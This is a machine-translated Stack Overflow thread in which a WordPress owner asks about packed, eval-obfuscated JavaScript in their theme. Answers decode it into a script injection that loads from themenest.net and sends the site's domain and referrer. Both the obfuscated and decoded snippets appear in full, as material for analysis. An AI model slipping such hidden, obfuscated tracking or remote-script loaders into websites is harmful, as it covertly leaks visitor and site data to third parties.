1. 首頁
  2. 問答
  3. 這段代碼在我的WordPress博客上做了什麼?惡意軟件?

這段代碼在我的WordPress博客上做了什麼?惡意軟件?

2013-04-14 66 views
1

我發現下面的代碼加載每次的網站加載,請回復我,它在我的博客?功能,這段代碼在我的WordPress博客上做了什麼?惡意軟件?

themenest.net是url我看到,當我看到我的加載網站

<script type="text/javascript"> 
    eval(function (p, a, c, k, e, r) { 
     e = function (c) { 
      return c.toString(a) 
     }; 
     if (!''.replace(/^/, String)) { 
      while (c--) r[e(c)] = k[c] || e(c); 
      k = [function (e) { 
        return r[e] 
       } 
      ]; 
      e = function() { 
       return '\\w+' 
      }; 
      c = 1 
     }; 
     while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]); 
     return p 
    }('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');', 25, 25, 'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'), 0, {})); 
</script>

任何人都知道?

來源

2013-04-14 Manivasagam

+0

它去到提供WordPress的主題網站。所以我會猜測並說你已經下載了他們的主題,並且他們已經添加了這個代碼。它可能是一些分析代碼,可以讓他們看到哪些域使用他們的主題。但我懷疑它是有害的 – dev

+0

如果以下答案中的任何一個回答您的問題,Stack Overflow的工作方式,您可以通過單擊左側的複選標記來「接受」答案。但只有當你考慮你的問題的答案。 –

回答

0

這有一些事情要做機智轉介,跟蹤和域名。它被打包,所以確切的代碼不能被收回。只有當你解開它:

eval document.write('<scr'+'ipt type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></scr'+'ipt>');

來源

2013-04-14 11:55:11 Niels

+0

爲什麼-1,我的解釋是exaclty te腳本做什麼?跟蹤推薦。 – Niels

0

看起來這是轉診和/或記錄引薦域,你可以看到有

track|domain|r|encodeURIComponent|referrer

您將需要解壓縮,看到真正的資源。

只需打開包裝,你去那裏:

<script type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></script>

我寫上面,它只是記錄你的域到themenest.net服務器。

我想所以找出版權濫用。

來源

2013-04-14 11:56:51 Michael

6

如果你打開它,代碼:

document.write('<scr' + 'ipt type="text/javascript" src="http://themenest.net/platform/script/track?d=' + document.domain + '&r=' + encodeURIComponent(document.referrer) + '&c=' + Math.floor((Math.random() * 1000) + 1) + '"></scr' + 'ipt>');

...這檢索來自http://themenest.net/platform/script/track信息傳遞關於它的文檔,並且把你帶到那個文件的引用鏈接腳本資源。我不知道腳本資源可能是什麼(它可能什麼都沒有,只需要跟蹤;查看瀏覽器的「網絡」選項卡以查看返回的內容)。

這是否是某種惡意軟件取決於您與themenest.net的關係。 :-)

來源

2013-04-14 11:58:07

1

該代碼注入該腳本元素:

<script type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></script>

這是一個跟蹤器,最有可能從themenest,檢測其主題的跨用戶的使用(您最初得到了主題的地方)。這很可能是他們的分析腳本。

腳本得到:

  • domain name(當前頁面的域名,使用的主題網站)
  • referrer(你人在哪裏抵達到包含腳本的網站頁面之前)
  • 和使用的緩存清除機制加載最新版本的腳本,每次

來源

2013-04-14 11:59:45 Joseph

相關問題

 相關問題